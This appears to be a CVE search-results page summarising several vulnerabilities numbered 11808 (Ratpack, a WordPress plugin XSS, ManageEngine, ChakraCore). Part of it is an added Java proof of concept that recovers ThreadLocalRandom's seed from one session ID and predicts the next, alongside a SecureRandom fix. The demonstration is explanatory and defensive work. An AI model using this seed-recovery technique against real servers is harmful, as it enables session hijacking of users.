17 matches found
CVE-2019-11808
Ratpack versions before 1.6.1 generate a session ID using a cryptographically weak PRNG in the JDK's ThreadLocalRandom. This means that if an attacker can determine a small window for the server start time and obtain a session ID value, they can theoretically determine the sequence of session IDs...
CVE-2024-11808
The Pingmeter Uptime Monitoring plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'wpnonce' parameter in all versions up to, and including, 1.0.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject...
CVE-2024-11808
creationtimestamp | type | source
---|---|---
2024-12-21 08:27:00+00:00 | seen | https://infosec.exchange/users/cve/statuses/113689861780764620
2024-12-21 09:15:23+00:00 | seen | https://bsky.app/profile/cve-notifications.bsky.social/post/3ldsktzmon52z
2024-12-21 11:09:07+00:00 | seen | ...
CVE-2024-11808
CVE-2024-11808 (Pingmeter Uptime Monitoring, WordPress) is a reflected XSS vulnerability in the Pingmeter Uptime Monitoring plugin for WordPress through the _wpnonce parameter, affecting all versions up to 1.0.3. The authenticated/unauthenticated risk is described as an attacker tricking a user i...
CVE-2024-11808 Pingmeter Uptime Monitoring <= 1.0.3 - Reflected Cross-Site Scripting
The Pingmeter Uptime Monitoring plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'wpnonce' parameter in all versions up to, and including, 1.0.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject...
360 Security Browser suffers from a DLL hijacking vulnerability (CNVD-2021-11808)
360 Security Browser is a browser built on a dual IE/Chrome kernel and launched by 360 Security Center; it is a product of cooperation between Phoenix Studio, the developer of Window of the World, and 360 Security Center. 360 Security Browser has a DLL hijacking vulnerability,...
Security Bulletin: IBM Watson Discovery for IBM Cloud Pak for Data affected by vulnerability in Ratpack
Summary IBM Watson Discovery for IBM Cloud Pak for Data contains a vulnerable version of Ratpack. Vulnerability Details CVEID: CVE-2019-11808 DESCRIPTION: Ratpack could allow a remote attacker to obtain sensitive information, caused by the use of a weak PRNG to generate session ID in JDK's...
com.github.grooviter:gql-ratpack (=0.5.0), io.ratpack:ratpack-pac4j (>=0.9.3 <=1.10.0-milestone-39) +3 more potentially affected by CVE-2019-11808 via io.ratpack:ratpack-session (>=0.9.10 <=1.6.0)
io.ratpack:ratpack-session MAVEN version =0.9.10, =0.9.3, =1.0.0, =1.10.0-milestone-1, =1.4.6, =3.0.0 Source cves: CVE-2019-11808 Source advisory: OSV:GHSA-54MG-VGRP-MWX9...
com.bytekast.serverless-local-apigateway:com.bytekast.serverless-local-apigateway.gradle.plugin (>=0.4 <=0.5), gradle.plugin.com.bytekast:serverless-local-apigateway (>=0.4 <=0.5) +1 more potentially affected by CVE-2019-11808 via io.ratpack:ratpack-groovy (>=0.9.0 <=1.6.0)
io.ratpack:ratpack-groovy MAVEN version =0.9.0, =0.4, =0.4, =0.9.0, =1.10.0-milestone-39 Source cves: CVE-2019-11808 Source advisory: OSV:GHSA-54MG-VGRP-MWX9...
CVE-2019-11808
CVE-2019-11808 affects Ratpack versions before 1.6.1, where session IDs are generated using a cryptographically weak PRNG in the JDK’s ThreadLocalRandom. The consequence is that if an attacker can narrow the server-start window and observe a session ID, they could theoretically determine the sequ...
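The CVE-2019-11808 entries above only outline the mechanism. The Java program below is an added example, not Ratpack's own code and not taken from any of the advisories listed here. It models a session-ID generator that packs two ThreadLocalRandom.nextLong() values into a UUID (an assumed model of the pre-1.6.1 behaviour, not a quote of the project's source) and then goes one step further than the advisory text: because nextLong() is mix64(seed += GAMMA) and mix64 is a bijection on 64-bit values, a single observed ID yields the issuing thread's exact seed, so no start-time window is needed to predict every later ID from that thread. The names weakSessionId, predictNextWeakId, strongSessionId and the UUID packing are choices made for this example; the constants GAMMA, M1 and M2 are the ones used by OpenJDK's ThreadLocalRandom (RandomSupport.mixMurmur64 in newer releases).

```java
import java.security.SecureRandom;
import java.util.Base64;
import java.util.UUID;
import java.util.concurrent.ThreadLocalRandom;

public class WeakSessionIdDemo {
    // Constants from OpenJDK's ThreadLocalRandom: nextLong() == mix64(seed += GAMMA).
    static final long GAMMA = 0x9e3779b97f4a7c15L;
    static final long M1 = 0xff51afd7ed558ccdL;
    static final long M2 = 0xc4ceb9fe1a85ec53L;

    // The JDK's mix64 (MurmurHash3 fmix64): three xorshift/multiply rounds.
    static long mix64(long z) {
        z = (z ^ (z >>> 33)) * M1;
        z = (z ^ (z >>> 33)) * M2;
        return z ^ (z >>> 33);
    }

    // Multiplicative inverse of an odd constant modulo 2^64 via Newton iteration on
    // wrapping longs: a*a == 1 (mod 8) for odd a, and each round doubles the correct bits.
    static long inverse(long a) {
        long x = a;
        for (int i = 0; i < 6; i++) {
            x *= 2 - a * x;
        }
        return x;
    }

    // Exact inverse of mix64. x ^ (x >>> 33) is its own inverse because the shift is >= 32,
    // and each multiplication is undone with the modular inverse of its constant.
    static long unmix64(long z) {
        z = (z ^ (z >>> 33)) * inverse(M2);
        z = (z ^ (z >>> 33)) * inverse(M1);
        return z ^ (z >>> 33);
    }

    // Assumed model of the weak generator: two ThreadLocalRandom outputs exposed verbatim
    // in the ID. UUID(long, long) stores both longs unmasked, so the ID leaks them exactly.
    static String weakSessionId() {
        ThreadLocalRandom r = ThreadLocalRandom.current();
        return new UUID(r.nextLong(), r.nextLong()).toString();
    }

    // Attacker side: invert the second output to recover the thread's current seed, then
    // step the seed forward by GAMMA to reproduce the next two outputs (the next ID).
    static String predictNextWeakId(String observedId) {
        long seed = unmix64(UUID.fromString(observedId).getLeastSignificantBits());
        long hi = mix64(seed + GAMMA);
        long lo = mix64(seed + 2 * GAMMA);
        return new UUID(hi, lo).toString();
    }

    // Hardened generator: 128 bits from a CSPRNG; no output reveals the generator state.
    private static final SecureRandom SECURE = new SecureRandom();

    static String strongSessionId() {
        byte[] id = new byte[16];
        SECURE.nextBytes(id);
        return Base64.getUrlEncoder().withoutPadding().encodeToString(id);
    }

    public static void main(String[] args) {
        String observed = weakSessionId();            // the one ID the attacker obtained
        String predicted = predictNextWeakId(observed);
        String actual = weakSessionId();              // next ID issued on the same thread
        System.out.println("observed : " + observed);
        System.out.println("predicted: " + predicted);
        System.out.println("actual   : " + actual);
        System.out.println("match    : " + predicted.equals(actual));
        System.out.println("strong   : " + strongSessionId());
    }
}
```

Compile and run with `javac WeakSessionIdDemo.java && java WeakSessionIdDemo`; the predicted and actual lines agree on every run. The inverse constants are computed at startup rather than hard-coded so the inversion can be checked against any JDK that keeps the same mix function. Two caveats a practitioner should keep in mind: the seed is per thread, so on a server with several event-loop threads the attacker needs an ID minted by the thread that will serve the victim (the hedge behind "theoretically" in the advisory text); and setting `java.util.secureRandomSeed=true` only changes the initial seed, not the fact that one output reveals the state, which is why the correct fix is a SecureRandom-backed generator as in strongSessionId.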
CVE-2018-11808
Incorrect Access Control in CustomFieldsFeedServlet in Zoho ManageEngine Applications Manager Version 13 before build 13740 allows an attacker to delete any file and read certain files on the server in the context of the user which by default is "NT AUTHORITY / SYSTEM" by sending a specially...
CVE-2018-11808
CVE-2018-11808 affects Zoho ManageEngine Applications Manager 13 before build 13740, where the CustomFieldsFeedServlet has improper access control. An attacker can remotely craft a request to delete arbitrary files and read certain files on the server, running in the context of the default user N...
Memory corruption
ChakraCore and Microsoft Edge in Microsoft Windows 10 Gold, 1511, 1607, 1703, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user, due to how the scripting engine handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability"...
CVE-2017-11808
CVE-2017-11808 affects ChakraCore (and Microsoft Edge) on Windows 10 versions (Gold/1511/1607/1703) and Windows Server 2016. The root cause is memory handling in the ChakraCore scripting engine, described as a memory corruption/information disclosure vulnerability that could allow an attacker to ...